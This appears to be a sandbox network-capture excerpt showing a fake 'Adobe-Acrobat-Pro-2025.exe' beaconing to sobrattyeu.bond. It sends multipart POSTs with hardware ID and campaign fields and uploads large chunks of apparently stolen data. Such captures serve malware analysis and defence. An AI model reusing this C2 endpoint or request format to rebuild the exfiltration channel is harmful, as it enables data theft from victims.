2025-01-15 15:14:26 UTC	1369	IN	Data Raw: 33 35 31 37 0d 0a 70 71 64 78 37 32 77 77 69 32 43 6c 32 52 42 50 46 6e 37 69 59 6c 4b 53 79 4d 31 6b 48 35 6e 4e 67 39 68 2f 2b 44 4b 44 4d 6d 55 67 39 57 58 2f 5a 44 72 4f 35 4f 73 61 55 55 75 48 2b 2f 45 6d 67 56 4c 4b 58 48 49 4e 57 73 77 42 6e 62 78 34 49 4a 47 67 4a 4f 66 6e 38 4b 36 74 73 30 6b 68 4a 70 70 51 6a 4a 66 2f 49 57 45 54 55 4d 68 4d 5a 38 31 4c 6e 67 4f 66 4c 53 78 79 6d 4b 43 68 62 71 62 78 4b 2f 32 31 32 65 59 33 6d 42 4b 64 51 65 77 68 49 70 45 52 43 73 39 6d 48 46 79 4f 41 4a 74 2b 2b 69 46 51 6f 71 53 6b 5a 33 64 75 37 62 44 49 59 61 57 59 30 67 6e 58 76 2f 4b 7a 51 56 4c 50 58 48 49 4e 56 45 75 44 6d 50 37 71 36 4e 46 6b 70 4b 52 6c 73 53 78 39 74 64 6e 6d 4e 35 67 53 6e 55 48 73 49 65 50 53 45 67 33 50 5a 42 31 61 54 38 44 64 76 Data Ascii: 3517pqdx72wwi2Cl2RBPFn7iYlKSyM1kH5nNg9h/+DKDMmUg9WX/ZDrO5OsaUUuH+/EmgVLKXHINWswBnbx4IJGgJOfn8K6ts0khJppQjJf/IWETUMhMZ81LngOfLSxymKChbqbxK/212eY3mBKdQewhIpERCs9mHFyOAJt++iFQoqSkZ3du7bDIYaWY0gnXv/KzQVLPXHINVEuDmP7q6NFkpKRlsSx9tdnmN5gSnUHsIePSEg3PZB1aT8Ddv
2025-01-15 15:14:26 UTC	1369	IN	Data Raw: 68 5a 6d 63 6d 39 32 38 76 4d 51 6f 68 70 6c 73 56 44 35 4e 2b 34 4b 41 53 30 51 73 4d 5a 35 31 59 54 55 4a 4a 4c 71 70 6a 56 72 4a 79 39 75 77 37 4b 71 67 77 6d 75 69 69 58 46 4d 4d 6c 50 6d 67 59 4a 47 57 69 67 68 30 44 73 67 4b 51 35 31 74 4c 47 63 55 70 36 55 68 4e 76 57 2f 62 48 45 61 64 6e 65 62 45 6b 37 55 76 75 4f 69 6b 42 45 4a 6a 53 56 66 32 77 30 43 47 7a 39 34 34 39 48 6a 35 6d 59 6d 38 43 38 75 73 77 67 6a 35 63 6e 43 48 56 59 36 4d 72 62 42 58 6f 31 4e 6f 68 34 63 48 6f 37 5a 2b 58 34 6e 30 2b 5a 6c 64 6d 36 7a 4c 47 31 7a 53 36 52 33 6e 67 49 4c 42 2f 33 68 73 4d 64 44 43 55 31 6e 48 5a 6e 4e 67 5a 70 2b 2b 36 42 54 59 4f 64 69 5a 72 4b 74 62 72 41 4a 4a 4f 55 62 56 51 38 56 76 32 45 69 31 64 50 5a 58 2f 51 63 6e 68 34 55 53 54 47 34 34 6c Data Ascii: hZmcm928vMQohplsVD5N+4KAS0QsMZ51YTUJJLqpjVrJy9uw7KqgwmuiiXFMMlPmgYJGWigh0DsgKQ51tLGcUp6UhNvW/bHEadnebEk7UvuOikBEJjSVf2w0CGz9449Hj5mYm8C8uswgj5cnCHVY6MrbBXo1Noh4cHo7Z+X4n0+Zldm6zLG1zS6R3ngILB/3hsMdDCU1nHZnNgZp++6BTYOdiZrKtbrAJJOUbVQ8Vv2Ei1dPZX/Qcnh4USTG44l
2025-01-15 15:14:26 UTC	1369	IN	Data Raw: 34 32 50 35 66 62 39 4b 6f 2b 51 59 46 41 6b 45 74 47 48 69 45 6c 42 4b 6a 72 51 4f 79 41 2b 53 54 79 6b 70 38 70 47 6d 4e 50 44 78 5a 33 6d 34 35 74 2b 30 63 78 34 43 43 77 66 35 73 72 62 46 77 4a 6c 49 39 41 74 49 48 38 4b 64 75 62 76 69 56 53 4b 31 4b 57 72 37 4b 71 67 77 6a 4c 44 75 47 42 58 50 45 6e 39 6d 4c 31 37 59 69 67 77 6b 33 73 69 43 52 39 70 35 4f 71 50 52 62 65 74 6c 5a 4c 62 75 72 6a 4f 4b 63 48 51 4a 30 6c 31 42 38 6e 4b 79 77 56 7a 61 33 47 49 4e 54 68 34 50 47 66 36 35 34 31 55 6d 4e 36 34 67 74 6d 33 72 59 6f 50 68 6f 39 75 55 44 68 4e 73 4d 54 44 51 77 78 39 59 64 34 31 5a 43 6c 4a 50 4b 53 37 30 52 66 61 78 4d 76 48 30 50 4f 76 69 44 2f 42 78 6a 55 49 64 55 32 77 30 73 4d 43 54 7a 63 6a 6c 6e 5a 32 4f 30 35 61 79 73 6d 42 56 49 69 65 Data Ascii: 42P5fb9Ko+QYFAkEtGHiElBKjrQOyA+STykp8pGmNPDxZ3m45t+0cx4CCwf5srbFwJlI9AtIH8KdubviVSK1KWr7KqgwjLDuGBXPEn9mL17Yigwk3siCR9p5OqPRbetlZLburjOKcHQJ0l1B8nKywVza3GINTh4PGf6541UmN64gtm3rYoPho9uUDhNsMTDQwx9Yd41ZClJPKS70RfaxMvH0POviD/BxjUIdU2w0sMCTzcjlnZ2O05aysmBVIie
2025-01-15 15:14:26 UTC	1369	IN	Data Raw: 6a 6c 6e 33 6e 54 67 53 6c 66 64 55 6d 77 30 74 45 4c 44 44 64 78 79 44 55 6e 4f 78 74 32 38 75 71 63 51 63 36 74 70 61 44 4d 73 37 6a 50 50 37 53 64 64 6b 55 31 56 4d 36 30 6f 6b 74 48 49 6a 32 47 53 31 34 4e 43 6d 72 36 37 70 78 54 79 64 33 62 6d 6f 2f 6c 6a 34 68 68 77 61 45 70 42 69 30 66 71 4d 71 32 52 6b 49 72 4e 6f 5a 6b 4c 51 30 4b 64 66 66 70 67 51 4c 48 30 35 33 56 6c 2b 2f 34 69 43 32 51 33 6a 38 57 5a 77 53 6c 32 64 51 56 48 6a 70 2f 69 54 56 32 65 46 45 32 75 71 6d 59 41 74 48 54 33 4a 62 64 72 37 44 4c 50 34 4c 5a 57 58 67 54 58 50 65 4d 67 45 74 62 4e 48 4f 2f 64 6d 73 30 42 57 50 69 31 37 52 58 69 70 32 56 6b 74 6d 73 39 6f 5a 70 6a 74 34 2f 66 33 56 4f 2b 6f 33 50 44 51 41 30 49 70 35 2b 64 6a 39 4a 57 37 71 70 6b 67 4c 52 30 36 36 57 77 Data Ascii: jln3nTgSlfdUmw0tELDDdxyDUnOxt28uqcQc6tpaDMs7jPP7SddkU1VM60oktHIj2GS14NCmr67pxTyd3bmo/lj4hhwaEpBi0fqMq2RkIrNoZkLQ0KdffpgQLH053Vl+/4iC2Q3j8WZwSl2dQVHjp/iTV2eFE2uqmYAtHT3Jbdr7DLP4LZWXgTXPeMgEtbNHO/dms0BWPi17RXip2Vktms9oZpjt4/f3VO+o3PDQA0Ip5+dj9JW7qpkgLR066Ww

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49713	104.21.80.1	443	2316	C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 15:14:27 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=3AEJNYBVC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12785 Host: sobrattyeu.bond
2025-01-15 15:14:27 UTC	12785	OUT	Data Raw: 2d 2d 33 41 45 4a 4e 59 42 56 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 39 31 35 30 31 35 44 41 41 36 31 36 38 46 43 38 32 35 37 31 44 39 39 41 38 45 42 30 41 39 38 0d 0a 2d 2d 33 41 45 4a 4e 59 42 56 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 41 45 4a 4e 59 42 56 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 0d 0a 2d 2d 33 41 45 4a 4e 59 42 56 43 0d 0a 43 6f 6e 74 65 6e 74 2d Data Ascii: --3AEJNYBVCContent-Disposition: form-data; name="hwid"0915015DAA6168FC82571D99A8EB0A98--3AEJNYBVCContent-Disposition: form-data; name="pid"2--3AEJNYBVCContent-Disposition: form-data; name="lid"yau6Na--899083440--3AEJNYBVCContent-
2025-01-15 15:14:28 UTC	1130	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 15:14:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9b6vqmfo6297mi8l5qtc1j12vk; expires=Sun, 11 May 2025 09:01:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XX9f8LgRyf1WIguKESYCx2DMQWTaBpR74qusZZq7WMsTAbP5jdmYFpW9sk0tD%2BNb0hk7l7DF9RH5dxC0%2FNq%2BxacOP6pxZiTxR%2FfutxJY%2F7ln4fLf0hgWuXotj8bMjlVVB2s%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9026d0caddfa43ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1714&min_rtt=1706&rtt_var=657&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13715&delivery_rate=1643218&cwnd=228&unsent_bytes=0&cid=808b59d2b052c25c&ts=819&x=0"
2025-01-15 15:14:28 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-15 15:14:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49716	104.21.80.1	443	2316	C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 15:14:29 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=12OJWFQG2G0S3KG5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15069 Host: sobrattyeu.bond
2025-01-15 15:14:29 UTC	15069	OUT	Data Raw: 2d 2d 31 32 4f 4a 57 46 51 47 32 47 30 53 33 4b 47 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 39 31 35 30 31 35 44 41 41 36 31 36 38 46 43 38 32 35 37 31 44 39 39 41 38 45 42 30 41 39 38 0d 0a 2d 2d 31 32 4f 4a 57 46 51 47 32 47 30 53 33 4b 47 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 32 4f 4a 57 46 51 47 32 47 30 53 33 4b 47 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 0d 0a Data Ascii: --12OJWFQG2G0S3KG5Content-Disposition: form-data; name="hwid"0915015DAA6168FC82571D99A8EB0A98--12OJWFQG2G0S3KG5Content-Disposition: form-data; name="pid"2--12OJWFQG2G0S3KG5Content-Disposition: form-data; name="lid"yau6Na--899083440
2025-01-15 15:14:32 UTC	1135	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 15:14:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4723c8mu0o3122r7utckrk6icg; expires=Sun, 11 May 2025 09:01:11 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FQGsdJC456TrpiY7GqYbXmMhrQ2sgNDpSZn7v86YasVBsIdkwscEA8wu4tU6gErAvfC7YY2m4ChymT%2F%2BPhF1jZtT%2BCEhsM94KVVdD%2BQ%2BKJhIpk8j6kb2Anrao94FRfJkjns%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9026d0d55a8f0f36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2359&min_rtt=1715&rtt_var=1103&sent=11&recv=18&lost=0&retrans=0&sent_bytes=2835&recv_bytes=16006&delivery_rate=1702623&cwnd=231&unsent_bytes=0&cid=7e70f5500ccacbad&ts=3965&x=0"
2025-01-15 15:14:32 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-15 15:14:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49747	104.21.80.1	443	2316	C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 15:14:33 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=1IUYL71TLHY30EG User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20553 Host: sobrattyeu.bond
2025-01-15 15:14:33 UTC	15331	OUT	Data Raw: 2d 2d 31 49 55 59 4c 37 31 54 4c 48 59 33 30 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 39 31 35 30 31 35 44 41 41 36 31 36 38 46 43 38 32 35 37 31 44 39 39 41 38 45 42 30 41 39 38 0d 0a 2d 2d 31 49 55 59 4c 37 31 54 4c 48 59 33 30 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 31 49 55 59 4c 37 31 54 4c 48 59 33 30 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 0d 0a 2d 2d 31 Data Ascii: --1IUYL71TLHY30EGContent-Disposition: form-data; name="hwid"0915015DAA6168FC82571D99A8EB0A98--1IUYL71TLHY30EGContent-Disposition: form-data; name="pid"3--1IUYL71TLHY30EGContent-Disposition: form-data; name="lid"yau6Na--899083440--1
2025-01-15 15:14:33 UTC	5222	OUT	Data Raw: c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 Data Ascii: MZh'F3Wun 4F([:7s~X`nO`i
2025-01-15 15:14:34 UTC	1126	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 15:14:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=23ch8viq5m6hivm7aquirml8ei; expires=Sun, 11 May 2025 09:01:12 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bF7D73wtN2%2FgLXfh5jWtzfaYR4Pw2C8yqv7sY3HbbtP8siuvRewPwlSII2A9oKpu9kQybohFwDywSBvibLIKiOdu%2FlfKQBAXzrcdZ3smC9WVYX2NwiYf4w8G77fV8HLuLMw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9026d0ef5e45c443-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4058&min_rtt=1515&rtt_var=2232&sent=12&recv=26&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21511&delivery_rate=1927392&cwnd=244&unsent_bytes=0&cid=76cc9e3d86a5ac87&ts=975&x=0"
2025-01-15 15:14:34 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-15 15:14:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49759	104.21.80.1	443	2316	C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 15:14:35 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=9JQAVX875J User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1382 Host: sobrattyeu.bond
2025-01-15 15:14:35 UTC	1382	OUT	Data Raw: 2d 2d 39 4a 51 41 56 58 38 37 35 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 39 31 35 30 31 35 44 41 41 36 31 36 38 46 43 38 32 35 37 31 44 39 39 41 38 45 42 30 41 39 38 0d 0a 2d 2d 39 4a 51 41 56 58 38 37 35 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 4a 51 41 56 58 38 37 35 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 0d 0a 2d 2d 39 4a 51 41 56 58 38 37 35 4a 0d 0a 43 6f 6e 74 Data Ascii: --9JQAVX875JContent-Disposition: form-data; name="hwid"0915015DAA6168FC82571D99A8EB0A98--9JQAVX875JContent-Disposition: form-data; name="pid"1--9JQAVX875JContent-Disposition: form-data; name="lid"yau6Na--899083440--9JQAVX875JCont
2025-01-15 15:14:38 UTC	1121	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 15:14:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pifmp7ia2l89pu2ugkv1pcgspf; expires=Sun, 11 May 2025 09:01:17 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dQ990LBo4LiVt7vyfrJ6FFbqfSQ8uss3m3c9T5iU4rUgJvzS04UpfdiEME8ilrarTH1%2FPOuXcbokaaUeO7pKQxtJANBbNlns2gGymE9O9Z6agO2k0OJX5n5tJ2ZruKW9274%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9026d0f9986343ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1749&min_rtt=1742&rtt_var=669&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2290&delivery_rate=1617728&cwnd=228&unsent_bytes=0&cid=26d11604d93a2730&ts=3533&x=0"
2025-01-15 15:14:38 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-15 15:14:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49791	104.21.80.1	443	2316	C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 15:14:39 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=8C2VKGC7DB4ZJ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 569315 Host: sobrattyeu.bond
2025-01-15 15:14:39 UTC	15331	OUT	Data Raw: 2d 2d 38 43 32 56 4b 47 43 37 44 42 34 5a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 39 31 35 30 31 35 44 41 41 36 31 36 38 46 43 38 32 35 37 31 44 39 39 41 38 45 42 30 41 39 38 0d 0a 2d 2d 38 43 32 56 4b 47 43 37 44 42 34 5a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 43 32 56 4b 47 43 37 44 42 34 5a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 0d 0a 2d 2d 38 43 32 56 4b 47 43 Data Ascii: --8C2VKGC7DB4ZJContent-Disposition: form-data; name="hwid"0915015DAA6168FC82571D99A8EB0A98--8C2VKGC7DB4ZJContent-Disposition: form-data; name="pid"1--8C2VKGC7DB4ZJContent-Disposition: form-data; name="lid"yau6Na--899083440--8C2VKGC
2025-01-15 15:14:39 UTC	15331	OUT	Data Raw: 78 eb 3e 50 74 84 8a 18 dc fd d7 bd 06 62 0a 95 c7 b4 47 0b 31 b1 eb 92 21 4a 2d 05 22 3f c3 2f 5a e2 c5 f0 07 10 60 85 09 24 65 56 72 73 69 2d 9b 26 4c cd c9 99 98 27 65 7b d4 a6 ec 32 63 d8 99 6a ef 4a 74 d5 ed 16 cb 37 82 87 f9 67 0e 02 5d f7 5f d6 52 10 dc f6 0d f1 c3 1e eb 17 67 5f 9f 30 4e f5 e7 6c 3f e3 01 9f 90 68 4b f0 a3 f7 68 56 92 40 ae 7d a1 66 b7 90 24 1a 9e 3f 62 3f 65 c7 79 4c f7 e4 b1 0f ce e4 01 94 3d c0 33 58 16 6c a7 ea fc aa 12 46 b1 ed fc 4c fd db 1a df 27 10 35 a7 4d 9d 39 01 10 b7 9d f6 0d f7 81 75 25 88 f9 db e2 ff e6 9a 90 07 75 1c 1c 11 82 a3 1d 00 34 5e d4 ed 3f e7 58 dc 40 12 18 13 58 db 7d 30 06 31 22 2b 5f 27 93 98 4a 1b 63 b1 bb 31 33 3b 5d 5f b5 fe 58 61 e1 61 71 20 c3 77 03 21 11 c0 73 5d c3 ae f9 86 d8 af 7a 17 d1 5c 34 Data Ascii: x>PtbG1!J-"?/Z`$eVrsi-&L'e{2cjJt7g]_Rg_0Nl?hKhV@}f$?b?eyL=3XlFL'5M9u%u4^?X@X}01"+_'Jc13;]_Xaaq w!s]z\4
2025-01-15 15:14:39 UTC	15331	OUT	Data Raw: 51 8b 0e 07 c2 74 40 2f dd bf 9d 39 62 9a 1a 56 6a 3c d1 78 d9 de 17 fc bc 4b fb f3 a5 2a 77 7d bd 38 37 bc f0 7f 6e 6a 9f 7b 18 74 24 dd e2 6d fb 24 19 a2 be e4 3a 9c 86 3a 39 2d 56 a4 8a 7e 97 9c 30 5b 5d b0 87 d8 10 b0 5b 38 1e a2 56 45 cf cb cb 0b 7f fe 42 bd 60 66 71 6c 24 ef 20 2a 87 9f 02 57 50 f4 3c ef 08 4f 3d 41 ca c3 f1 86 58 2e b4 2f 2e 43 71 dd 8c 6c 02 9c 93 03 56 ed 04 30 98 17 ed 5b c5 a3 72 38 3e f7 67 26 0a fb 25 c9 cc c7 d2 ad fd fe dc 93 6e 6e 16 c3 19 ee 93 8a f7 b6 7e 1a 12 79 78 56 6d 8b a9 7b f1 bc ed 28 d2 29 47 c6 f0 cf 79 47 4c d2 82 12 5c 69 9e 82 6f ba 40 32 ac 69 96 4d 7a 14 72 70 a2 4e 8b 29 7d cd 96 de 25 dc 23 04 14 4e 3a a1 1a 32 d2 3b 87 d8 6e a9 3a 9b 83 1b 73 9b 78 e9 3b 44 dd 05 f8 23 87 bd 35 70 4b 3a b0 e7 6c ca b1 Data Ascii: Qt@/9bVj<xKw}87nj{t$m$::9-V~0[][8VEB`fql$ WP<O=AX./.CqlV0[r8>g&%nn~yxVm{()GyGL\io@2iMzrpN)}%#N:2;n:sx;D#5pK:l
2025-01-15 15:14:39 UTC	15331	OUT	Data Raw: b9 73 8c d3 a8 73 16 f7 0f 80 d4 40 04 7b 3e 79 8f 72 d1 1d 5d 89 36 3d 9a 6b 1a 81 d1 a7 ad a5 3c 8f 5b 66 dd f2 1f 71 5e 26 2d fa 55 56 8e 1a 8c f4 95 65 09 15 34 ad b6 ad d6 1c fb 6e c8 52 07 7a f5 b4 21 80 42 a1 00 07 b6 c0 69 12 cd 1b 7c c4 f9 92 0d 2d 20 06 36 fc 1f 35 55 1e 4d 5e a5 0e fc 5e 98 57 87 83 62 8d e6 53 50 64 f3 82 76 8a e6 dc bd 1c 9b 87 2e 73 10 40 61 67 1e d3 db ed f6 40 14 1a 99 11 ca 43 17 47 09 9a 83 2e 1c ff 4c c2 85 44 7b d1 32 db 70 7e 38 58 10 0f 7c fa 27 76 6c 4f 54 bb ee 60 d9 92 f0 18 b3 2a 06 d6 52 36 cd 9d e0 ae ea 9c a4 e9 2e 92 7d f7 c3 6e 88 fe 10 4d 8f a0 1b e0 b6 c3 e9 ac 3b a2 1b 81 9f 9e f0 40 81 98 d3 7d 4c d3 f7 e5 1f 9c 30 19 fd 6d bf f0 7c 20 d0 da f1 e1 a9 f9 7f 5a c6 22 4a 96 78 f9 c2 8f ba b8 e0 